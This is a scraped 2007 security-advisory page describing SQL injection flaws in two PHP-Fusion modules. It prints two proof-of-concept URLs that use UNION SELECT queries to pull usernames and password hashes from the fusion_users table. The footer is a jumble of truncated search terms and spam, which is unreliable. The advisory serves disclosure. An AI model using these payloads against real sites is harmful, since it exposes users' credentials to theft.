about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities


Title PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
Published 2007-04-02-12:00AM
Updated 2007-04-03-05:02PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  xoron is credited with the discovery of these vulnerabilities.
Vulnerable  PHPFusion Topliste 1.0
PHPFusion Arcade Module 1.0
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available.

http://www.example.com/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
http://www.example.com/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 19:52:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
facials CMS is Fre windows x WWW. Doodh dani+woodw ww.sec19.c brute forc CERITA COM www.pink w Artis tanp Invision P maxcpm.inf www.b30199 www.serxyg smart movi /search/ex Windows me 0.93 bsdroot hot clippi www.firm36 Saxsy Hinhanh.co phpbb por openi www.links4 WWW.SEX KO www.trish girls fuak Wwww.pinkw girls fuak hoteldd.in www,cartoo easymod goran www.movief joomla rem viedio www.znlase maxcpm.inf Domain Te news for c win exploi antiproxy www.skins. \\\ Sexsy gril bideos Laxpionsex Vulnerabil